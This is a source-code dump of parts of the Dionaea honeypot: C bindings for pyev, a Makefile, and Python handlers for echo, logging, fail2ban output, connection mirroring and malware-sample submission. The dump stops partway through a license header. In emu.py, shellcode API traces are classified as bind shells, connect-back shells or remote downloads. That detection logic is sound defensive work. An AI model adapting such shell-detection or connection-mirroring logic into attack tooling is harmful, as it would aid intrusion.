/*tp_as_sequence*/ 37 | 0, /*tp_as_mapping*/ 38 | 0, /*tp_hash */ 39 | 0, /*tp_call*/ 40 | 0, /*tp_str*/ 41 | 0, /*tp_getattro*/ 42 | 0, /*tp_setattro*/ 43 | 0, /*tp_as_buffer*/ 44 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 45 | Prepare_tp_doc, /*tp_doc*/ 46 | 0, /*tp_traverse*/ 47 | 0, /*tp_clear*/ 48 | 0, /*tp_richcompare*/ 49 | 0, /*tp_weaklistoffset*/ 50 | 0, /*tp_iter*/ 51 | 0, /*tp_iternext*/ 52 | 0, /*tp_methods*/ 53 | 0, /*tp_members*/ 54 | 0, /*tp_getsets*/ 55 | 0, /*tp_base*/ 56 | 0, /*tp_dict*/ 57 | 0, /*tp_descr_get*/ 58 | 0, /*tp_descr_set*/ 59 | 0, /*tp_dictoffset*/ 60 | 0, /*tp_init*/ 61 | 0, /*tp_alloc*/ 62 | Prepare_tp_new, /*tp_new*/ 63 | }; 64 | -------------------------------------------------------------------------------- /modules/python/pyev/Signal.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * utilities 3 | *******************************************************************************/ 4 | 5 | /* set the Signal */ 6 | int 7 | set_Signal(Signal *self, int signum) 8 | { 9 | if (signum <= 0 || signum >= EV_NSIG) { 10 | PyErr_SetString(Error, "illegal signal number"); 11 | return -1; 12 | } 13 | #if EV_MULTIPLICITY 14 | if (signals[signum - 1].loop && 15 | signals[signum - 1].loop != ((Watcher *)self)->loop->loop) { 16 | PyErr_SetString(Error, "the same signal must not be attached to two " 17 | "different loops"); 18 | return -1; 19 | } 20 | #endif 21 | ev_signal_set(&self->signal, signum); 22 | return 0; 23 | } 24 | 25 | 26 | /******************************************************************************* 27 | * SignalType 28 | *******************************************************************************/ 29 | 30 | /* SignalType.tp_doc */ 31 | PyDoc_STRVAR(Signal_tp_doc, 32 | "Signal(signum, loop, callback[, data=None, priority=0])"); 33 | 34 | 35 | /* SignalType.tp_new */ 36 | static PyObject * 37 | Signal_tp_new(PyTypeObject *type, PyObject *args, PyObject *kwargs) 38 | { 39 | Signal *self = (Signal *)WatcherType.tp_new(type, args, kwargs); 40 | if (!self) { 41 | return NULL; 42 | } 43 | new_Watcher((Watcher *)self, (ev_watcher *)&self->signal, EV_SIGNAL); 44 | return (PyObject *)self; 45 | } 46 | 47 | 48 | /* SignalType.tp_init */ 49 | static int 50 | Signal_tp_init(Signal *self, PyObject *args, PyObject *kwargs) 51 | { 52 | int signum; 53 | Loop *loop; 54 | PyObject *callback, *data = NULL; 55 | int priority = 0; 56 | 57 | static char *kwlist[] = {"signum", 58 | "loop", "callback", "data", "priority", NULL}; 59 | 60 | if (!PyArg_ParseTupleAndKeywords(args, kwargs, "iO!O|Oi:__init__", kwlist, 61 | &signum, 62 | &LoopType, &loop, &callback, &data, &priority)) { 63 | return -1; 64 | } 65 | if (init_Watcher((Watcher *)self, loop, callback, 1, data, priority)) { 66 | return -1; 67 | } 68 | return set_Signal(self, signum); 69 | } 70 | 71 | 72 | /* Signal.set(signum) */ 73 | PyDoc_STRVAR(Signal_set_doc, 74 | "set(signum)"); 75 | 76 | static PyObject * 77 | Signal_set(Signal *self, PyObject *args) 78 | { 79 | int signum; 80 | 81 | PYEV_SET_ACTIVE_WATCHER(self); 82 | if (!PyArg_ParseTuple(args, "i:set", &signum)) { 83 | return NULL; 84 | } 85 | if (set_Signal(self, signum)) { 86 | return NULL; 87 | } 88 | Py_RETURN_NONE; 89 | } 90 | 91 | 92 | /* SignalType.tp_methods */ 93 | static PyMethodDef Signal_tp_methods[] = { 94 | {"set", (PyCFunction)Signal_set, 95 | METH_VARARGS, Signal_set_doc}, 96 | {NULL} /* Sentinel */ 97 | }; 98 | 99 | 100 | /* Signal.signum */ 101 | PyDoc_STRVAR(Signal_signum_doc, 102 | "signum"); 103 | 104 | 105 | /* SignalType.tp_members */ 106 | static PyMemberDef Signal_tp_members[] = { 107 | {"signum", T_INT, offsetof(Signal, signal.signum), 108 | READONLY, Signal_signum_doc}, 109 | {NULL} /* Sentinel */ 110 | }; 111 | 112 | 113 | /* SignalType */ 114 | static PyTypeObject SignalType = { 115 | PyVarObject_HEAD_INIT(NULL, 0) 116 | "pyev.Signal", /*tp_name*/ 117 | sizeof(Signal), /*tp_basicsize*/ 118 | 0, /*tp_itemsize*/ 119 | 0, /*tp_dealloc*/ 120 | 0, /*tp_print*/ 121 | 0, /*tp_getattr*/ 122 | 0, /*tp_setattr*/ 123 | 0, /*tp_compare*/ 124 | 0, /*tp_repr*/ 125 | 0, /*tp_as_number*/ 126 | 0, /*tp_as_sequence*/ 127 | 0, /*tp_as_mapping*/ 128 | 0, /*tp_hash */ 129 | 0, /*tp_call*/ 130 | 0, /*tp_str*/ 131 | 0, /*tp_getattro*/ 132 | 0, /*tp_setattro*/ 133 | 0, /*tp_as_buffer*/ 134 | Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE, /*tp_flags*/ 135 | Signal_tp_doc, /*tp_doc*/ 136 | 0, /*tp_traverse*/ 137 | 0, /*tp_clear*/ 138 | 0, /*tp_richcompare*/ 139 | 0, /*tp_weaklistoffset*/ 140 | 0, /*tp_iter*/ 141 | 0, /*tp_iternext*/ 142 | Signal_tp_methods, /*tp_methods*/ 143 | Signal_tp_members, /*tp_members*/ 144 | 0, /*tp_getsets*/ 145 | 0, /*tp_base*/ 146 | 0, /*tp_dict*/ 147 | 0, /*tp_descr_get*/ 148 | 0, /*tp_descr_set*/ 149 | 0, /*tp_dictoffset*/ 150 | (initproc)Signal_tp_init, /*tp_init*/ 151 | 0, /*tp_alloc*/ 152 | Signal_tp_new, /*tp_new*/ 153 | }; 154 | -------------------------------------------------------------------------------- /modules/python/scripts/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | PYSCRIPTS = sip/__init__.py 6 | PYSCRIPTS += sip/extras.py 7 | PYSCRIPTS += sip/rfc2396.py 8 | PYSCRIPTS += sip/rfc2617.py 9 | PYSCRIPTS += sip/rfc3261.py 10 | PYSCRIPTS += sip/rfc4566.py 11 | PYSCRIPTS += tftp.py 12 | PYSCRIPTS += echo.py 13 | PYSCRIPTS += ftp.py 14 | PYSCRIPTS += services.py 15 | PYSCRIPTS += smb/include/fieldtypes.py 16 | PYSCRIPTS += smb/include/smbfields.py 17 | PYSCRIPTS += smb/include/__init__.py 18 | PYSCRIPTS += smb/include/helpers.py 19 | PYSCRIPTS += smb/include/packet.py 20 | PYSCRIPTS += smb/include/asn1fields.py 21 | PYSCRIPTS += smb/include/asn1packet.py 22 | PYSCRIPTS += smb/include/asn1/__init__.py 23 | PYSCRIPTS += smb/include/asn1/asn1.py 24 | PYSCRIPTS += smb/include/asn1/ber.py 25 | PYSCRIPTS += smb/include/asn1/mib.py 26 | PYSCRIPTS += smb/include/ntlmfields.py 27 | PYSCRIPTS += smb/include/gssapifields.py 28 | PYSCRIPTS += smb/__init__.py 29 | PYSCRIPTS += smb/smb.py 30 | PYSCRIPTS += smb/rpcservices.py 31 | PYSCRIPTS += test.py 32 | PYSCRIPTS += mirror.py 33 | PYSCRIPTS += nfq.py 34 | PYSCRIPTS += http.py 35 | PYSCRIPTS += log.py 36 | PYSCRIPTS += logsql.py 37 | PYSCRIPTS += p0f.py 38 | PYSCRIPTS += cmd.py 39 | PYSCRIPTS += emu.py 40 | PYSCRIPTS += ihandlers.py 41 | PYSCRIPTS += util.py 42 | PYSCRIPTS += store.py 43 | PYSCRIPTS += surfids.py 44 | PYSCRIPTS += virustotal.py 45 | PYSCRIPTS += mwserv.py 46 | PYSCRIPTS += submit_http.py 47 | PYSCRIPTS += hpfeeds.py 48 | PYSCRIPTS += ndrlib.py 49 | PYSCRIPTS += logxmpp.py 50 | PYSCRIPTS += fail2ban.py 51 | PYSCRIPTS += __init__.py 52 | PYSCRIPTS += mssql/__init__.py 53 | PYSCRIPTS += mssql/mssql.py 54 | PYSCRIPTS += mssql/include/tds.py 55 | PYSCRIPTS += mssql/include/__init__.py 56 | PYSCRIPTS += mysql/__init__.py 57 | PYSCRIPTS += mysql/mysql.py 58 | PYSCRIPTS += mysql/include/packets.py 59 | PYSCRIPTS += mysql/include/fields.py 60 | PYSCRIPTS += mysql/include/__init__.py 61 | PYSCRIPTS += pptp/__init__.py 62 | PYSCRIPTS += pptp/pptp.py 63 | PYSCRIPTS += pptp/include/packets.py 64 | PYSCRIPTS += pptp/include/__init__.py 65 | PYSCRIPTS += mqtt/__init__.py 66 | PYSCRIPTS += mqtt/mqtt.py 67 | PYSCRIPTS += mqtt/include/packets.py 68 | PYSCRIPTS += mqtt/mqtt.py 69 | PYSCRIPTS += mqtt/include/__init__.py 70 | PYSCRIPTS += upnp/__init__.py 71 | PYSCRIPTS += upnp/upnp.py 72 | 73 | 74 | all: $(PYSCRIPTS) 75 | 76 | 77 | install-data-am: all 78 | for i in $(PYSCRIPTS); do \ 79 | location=$(DESTDIR)$(pkglibdir)"/python/dionaea/$$i"; \ 80 | scriptdir=`dirname "$$location"`; \ 81 | if [ ! -d $$scriptdir ]; then \ 82 | $(mkinstalldirs) $$scriptdir; \ 83 | fi; \ 84 | $(INSTALL_DATA) $$i $$location; \ 85 | done 86 | 87 | EXTRA_DIST = $(PYSCRIPTS) 88 | -------------------------------------------------------------------------------- /modules/python/scripts/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/echo.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter & Mark Schloesser 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | 29 | from dionaea.core import connection 30 | class echo(connection): 31 | def __init__ (self, proto=None): 32 | print("echo init") 33 | connection.__init__(self,proto) 34 | self.timeouts.idle = 5. 35 | self.timeouts.sustain = 10. 36 | def handle_origin(self, parent): 37 | print("origin!") 38 | print("parent {:s} {:s}:{:d}".format(parent.protocol, parent.local.host,parent.local.port)) 39 | print("self {:s} {:s}:{:d} -> {:s}:{:d}".format(self.protocol, self.local.host,self.local.port, self.remote.host,self.remote.port)) 40 | def handle_established(self): 41 | print("new connection to serve!") 42 | self.send('welcome to reverse world!\n') 43 | def handle_timeout_idle(self): 44 | self.send("you are idle!\n") 45 | return True 46 | def handle_timeout_sustain(self): 47 | self.send("your sustain timeouted!\n") 48 | return False 49 | def handle_disconnect(self): 50 | self.send("disconnecting you!\n") 51 | def handle_io_in(self,data): 52 | print('py_io_in\n') 53 | self.send(data[::-1][1:] + b'\n') 54 | return len(data) 55 | 56 | # 57 | #e = echo(proto='tcp') 58 | #e.bind('0.0.0.0',4713,'') 59 | #e.listen() 60 | 61 | -------------------------------------------------------------------------------- /modules/python/scripts/emu.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter & Mark Schloesser 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | 29 | from dionaea.core import ihandler, incident 30 | from dionaea.core import connection 31 | from dionaea.cmd import cmdexe 32 | import logging 33 | import json 34 | 35 | logger = logging.getLogger('emu') 36 | logger.setLevel(logging.DEBUG) 37 | 38 | class emuprofilehandler(ihandler): 39 | 40 | def __init__(self, path): 41 | logger.debug("%s ready!" % (self.__class__.__name__)) 42 | ihandler.__init__(self, path) 43 | 44 | def handle_incident(self, icd): 45 | logger.debug("profiling") 46 | p = icd.get("profile") 47 | try: 48 | con = icd.get("con") 49 | except AttributeError: 50 | con = None 51 | p = json.loads(p) 52 | # print(p) 53 | logger.info("profiledump %s" % (p)) 54 | state = "NONE" 55 | host = None 56 | port = None 57 | 58 | for api in p: 59 | 60 | if state == "NONE": 61 | if api['call'] == 'WSASocket' or api['call'] == 'socket': 62 | state = "SOCKET" 63 | if api['call'] == 'URLDownloadToFile': 64 | url = api['args'][1] 65 | logger.debug("download file %s" % (url)) 66 | i = incident("dionaea.download.offer") 67 | i.set("url", url) 68 | if con is not None: 69 | i.set("con", con) 70 | i.report() 71 | if api['call'] == 'WinExec': 72 | r = cmdexe(None) 73 | r.con = con 74 | r.handle_io_in(api['args'][0].encode() + b'\0') 75 | if api['call'] == 'CreateProcess': 76 | r = cmdexe(None) 77 | r.con = con 78 | r.handle_io_in(api['args'][1].encode() + b'\0') 79 | 80 | elif state == "SOCKET": 81 | if api['call'] == 'bind': 82 | state = "BIND" 83 | host = api['args'][1]['sin_addr']['s_addr'] 84 | port = api['args'][1]['sin_port'] 85 | elif api['call'] == 'connect': 86 | state = "CONNECT" 87 | host = api['args'][1]['sin_addr']['s_addr'] 88 | port = api['args'][1]['sin_port'] 89 | elif api['call'] == 'CreateProcess': 90 | state = "CREATEPROCESS" 91 | 92 | elif state == "BIND": 93 | if api['call'] == 'listen': 94 | state = "LISTEN" 95 | 96 | elif state == "LISTEN": 97 | if api['call'] == 'accept': 98 | state = "ACCEPT" 99 | 100 | elif state == "ACCEPT": 101 | if api['call'] == 'CreateProcess': 102 | logger.debug("bindshell host %s port %s" % (host, port) ) 103 | i = incident("dionaea.service.shell.listen") 104 | i.set("port", int(port)) 105 | if con is not None: 106 | i.set("con", con) 107 | i.report() 108 | 109 | elif state == "CONNECT": 110 | if api['call'] == 'CreateProcess': 111 | logger.debug("connectbackshell host %s port %s" % (host, port) ) 112 | i = incident("dionaea.service.shell.connect") 113 | i.set("port", int(port)) 114 | i.set("host", host) 115 | if con is not None: 116 | i.set("con", con) 117 | i.report() 118 | 119 | elif state == "CREATEPROCESS": 120 | if api['call'] == 'connect': 121 | host = api['args'][1]['sin_addr']['s_addr'] 122 | port = api['args'][1]['sin_port'] 123 | logger.debug("connectbackshell host %s port %s" % (host, port) ) 124 | i = incident("dionaea.service.shell.connect") 125 | i.set("port", int(port)) 126 | i.set("host", host) 127 | if con is not None: 128 | i.set("con", con) 129 | i.report() 130 | state = "DONE" 131 | 132 | 133 | # set connection sustain timeout to low value, fainting death 134 | con.timeouts.sustain = 3.0 135 | 136 | -------------------------------------------------------------------------------- /modules/python/scripts/fail2ban.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | 29 | from dionaea.core import ihandler, incident, g_dionaea 30 | 31 | import os 32 | import logging 33 | import random 34 | import json 35 | import sqlite3 36 | import datetime 37 | 38 | logger = logging.getLogger('fail2ban') 39 | logger.setLevel(logging.DEBUG) 40 | 41 | class fail2banhandler(ihandler): 42 | def __init__(self): 43 | logger.debug("%s ready!" % (self.__class__.__name__)) 44 | ihandler.__init__(self, "*") 45 | offers = g_dionaea.config()['modules']['python']['fail2ban']['offers'] 46 | downloads = g_dionaea.config()['modules']['python']['fail2ban']['downloads'] 47 | self.offers = open(offers, "a") 48 | self.downloads = open(downloads, "a") 49 | 50 | def handle_incident_dionaea_download_offer(self, icd): 51 | data = "%s %s %s %s\n" % (datetime.datetime.now().isoformat(), icd.con.local.host, icd.con.remote.host, icd.url) 52 | self.offers.write(data) 53 | self.offers.flush() 54 | 55 | def handle_incident_dionaea_download_complete_hash(self, icd): 56 | data = "%s %s %s %s %s\n" % (datetime.datetime.now().isoformat(), icd.con.local.host, icd.con.remote.host, icd.url, icd.md5hash) 57 | self.downloads.write(data) 58 | self.downloads.flush() 59 | 60 | -------------------------------------------------------------------------------- /modules/python/scripts/log.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | from dionaea.core import * 29 | import logging 30 | 31 | global handler 32 | global logger 33 | 34 | class DionaeaLogHandler(logging.Handler): 35 | def __init__(self): 36 | logging.Handler.__init__(self, logging.DEBUG) 37 | def emit(self,record): 38 | dlhfn(record.name, record.levelno, record.pathname, record.lineno, record.msg) 39 | 40 | def start(): 41 | pass 42 | 43 | def new(): 44 | global logger 45 | global handler 46 | logger = logging.getLogger('') 47 | logger.setLevel(logging.DEBUG) 48 | handler = DionaeaLogHandler() 49 | logger.addHandler(handler) 50 | 51 | def stop(): 52 | global logger 53 | global handler 54 | logger.removeHandler(handler) 55 | 56 | 57 | -------------------------------------------------------------------------------- /modules/python/scripts/mirror.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | #* Copyright (c) 2006-2009 Michael P. Soulier 9 | #* 10 | #* This program is free software; you can redistribute it and/or 11 | #* modify it under the terms of the GNU General Public License 12 | #* as published by the Free Software Foundation; either version 2 13 | #* of the License, or (at your option) any later version. 14 | #* 15 | #* This program is distributed in the hope that it will be useful, 16 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | #* GNU General Public License for more details. 19 | #* 20 | #* You should have received a copy of the GNU General Public License 21 | #* along with this program; if not, write to the Free Software 22 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 23 | #* 24 | #* 25 | #* contact nepenthesdev@gmail.com 26 | #* 27 | #*******************************************************************************/ 28 | 29 | from dionaea.core import connection 30 | import struct 31 | import logging 32 | import os 33 | import sys 34 | import datetime 35 | 36 | logger = logging.getLogger('mirror') 37 | logger.setLevel(logging.DEBUG) 38 | 39 | class mirrorc(connection): 40 | def __init__(self, peer=None): 41 | logger.debug("mirror connection %s %s" %( peer.remote.host, peer.local.host)) 42 | connection.__init__(self,peer.transport) 43 | self.bind(peer.local.host,0) 44 | self.connect(peer.remote.host,peer.local.port) 45 | # self.connect('',peer.local.port) 46 | self.peer = peer 47 | 48 | def handle_established(self): 49 | self.peer.peer = self 50 | 51 | def handle_io_in(self, data): 52 | if self.peer: 53 | self.peer.send(data) 54 | return len(data) 55 | 56 | def handle_error(self, err): 57 | if self.peer: 58 | self.peer.peer = None 59 | self.peer.close() 60 | 61 | def handle_disconnect(self): 62 | if self.peer: 63 | self.peer.close() 64 | if self.peer: 65 | self.peer.peer = None 66 | return 0 67 | 68 | class mirrord(connection): 69 | def __init__(self, proto=None, host=None, port=None, iface=None): 70 | connection.__init__(self,proto) 71 | if host: 72 | self.bind(host, port, iface) 73 | self.listen() 74 | self.peer=None 75 | 76 | def handle_established(self): 77 | self.peer=mirrorc(self) 78 | self.timeouts.sustain = 60 79 | self._in.accounting.limit = 100*1024 80 | self._out.accounting.limit = 100*1024 81 | 82 | def handle_io_in(self, data): 83 | if self.peer: 84 | self.peer.send(data) 85 | return len(data) 86 | 87 | def handle_error(self, err): 88 | logger.debug("mirrord connection error?, should not happen") 89 | if self.peer: 90 | self.peer.peer = None 91 | 92 | def handle_disconnect(self): 93 | if self.peer: 94 | self.peer.close() 95 | if self.peer: 96 | self.peer.peer = None 97 | return 0 98 | 99 | -------------------------------------------------------------------------------- /modules/python/scripts/mqtt/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mqtt/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/mqtt/include/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mqtt/include/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/mssql/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mssql/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/mssql/include/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mssql/include/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/mwserv.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2010 Mark Schloesser 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | from dionaea.core import ihandler, incident, g_dionaea 29 | from dionaea.util import md5file, sha512file 30 | from dionaea import pyev 31 | 32 | import logging 33 | import json 34 | import uuid 35 | 36 | logger = logging.getLogger('mwserv') 37 | logger.setLevel(logging.DEBUG) 38 | 39 | class mwserv_report: 40 | def __init__(self, sha512h, filepath): 41 | self.sha512h, self.filepath = sha512h, filepath 42 | self.saddr, self.sport, self.daddr, self.dport = ('', )*4 43 | self.download_url = '' 44 | 45 | 46 | class mwservhandler(ihandler): 47 | def __init__(self, path): 48 | logger.debug("%s ready!" % (self.__class__.__name__)) 49 | ihandler.__init__(self, path) 50 | mwsconfig = g_dionaea.config()['modules']['python']['mwserv'] 51 | self.backendurl = mwsconfig['url'] 52 | self.maintainer = mwsconfig['maintainer'] 53 | self.guid = mwsconfig['guid'] 54 | self.secret = mwsconfig['secret'] 55 | self.cookies = {} 56 | 57 | # heartbeats 58 | dinfo = g_dionaea.version() 59 | self.software = 'dionaea {0} {1}/{2} - {3} {4}'.format( 60 | dinfo['dionaea']['version'], 61 | dinfo['compiler']['os'], 62 | dinfo['compiler']['arch'], 63 | dinfo['compiler']['date'], 64 | dinfo['compiler']['time'], 65 | ) 66 | self.loop = pyev.default_loop() 67 | self.heartbeat_timer = pyev.Timer(5., 120, self.loop, self._heartbeat) 68 | self.heartbeat_timer.start() 69 | 70 | def stop(self): 71 | self.heartbeat_timer.stop() 72 | self.heartbeat_timer = None 73 | self.loop = None 74 | 75 | 76 | def _heartbeat(self, events, data): 77 | logger.info("mwserv _heartbeat") 78 | i = incident("dionaea.upload.request") 79 | i._url = self.backendurl + 'heartbeat' 80 | i.maintainer = self.maintainer 81 | i.guid = self.guid 82 | i.secret = self.secret 83 | i.software = self.software 84 | 85 | i._callback = "dionaea.modules.python.mwserv.heartbeatresult" 86 | i.report() 87 | 88 | def handle_incident(self, icd): 89 | pass 90 | 91 | def handle_incident_dionaea_download_complete_unique(self, icd): 92 | cookie = str(uuid.uuid4()) 93 | 94 | i = incident("dionaea.upload.request") 95 | i._url = self.backendurl + 'nepenthes/submit' 96 | 97 | i.sha512 = sha512file(icd.file) 98 | i.maintainer = self.maintainer 99 | i.guid = self.guid 100 | i.secret = self.secret 101 | 102 | mr = mwserv_report(i.sha512, icd.file) 103 | 104 | if hasattr(icd, 'con'): 105 | i.saddr = icd.con.remote.host 106 | i.sport = str(icd.con.remote.port) 107 | i.daddr = icd.con.local.host 108 | i.dport = str(icd.con.local.port) 109 | mr.saddr, mr.sport, mr.daddr, mr.dport = i.saddr, i.sport, i.daddr, i.dport 110 | if hasattr(icd, 'url'): 111 | i.url = icd.url 112 | mr.download_url = icd.url 113 | 114 | i._callback = "dionaea.modules.python.mwserv.result" 115 | i._userdata = cookie 116 | 117 | self.cookies[cookie] = mr 118 | i.report() 119 | 120 | # handle agains in the same way 121 | handle_incident_dionaea_download_complete_again = handle_incident_dionaea_download_complete_unique 122 | 123 | def handle_incident_dionaea_modules_python_mwserv_result(self, icd): 124 | fh = open(icd.path, mode="rb") 125 | c = fh.read() 126 | logger.info("mwserv result: {0}".format(c)) 127 | 128 | cookie = icd._userdata 129 | mr = self.cookies[cookie] 130 | 131 | # does backend want us to upload? 132 | if b'UNKNOWN' in c: 133 | i = incident("dionaea.upload.request") 134 | i._url = self.backendurl + 'nepenthes/submit' 135 | 136 | i.sha512 = mr.sha512h 137 | i.maintainer = self.maintainer 138 | i.guid = self.guid 139 | i.secret = self.secret 140 | 141 | i.set('file://data', mr.filepath) 142 | 143 | i.saddr = mr.saddr 144 | i.sport = mr.sport 145 | i.daddr = mr.daddr 146 | i.dport = mr.dport 147 | i.url = mr.download_url 148 | 149 | i._callback = "dionaea.modules.python.mwserv.uploadresult" 150 | i._userdata = cookie 151 | 152 | i.report() 153 | else: 154 | del self.cookies[cookie] 155 | 156 | def handle_incident_dionaea_modules_python_mwserv_uploadresult(self, icd): 157 | fh = open(icd.path, mode="rb") 158 | c = fh.read() 159 | logger.info("mwserv uploadresult: {0}".format(c)) 160 | 161 | del self.cookies[icd._userdata] 162 | 163 | def handle_incident_dionaea_modules_python_mwserv_heartbeatresult(self, icd): 164 | fh = open(icd.path, mode="rb") 165 | c = fh.read() 166 | logger.info("mwserv heartbeatresult: {0}".format(c)) 167 | 168 | 169 | -------------------------------------------------------------------------------- /modules/python/scripts/mysql/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mysql/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/mysql/include/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mysql/include/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/mysql/include/fields.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2011 Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along 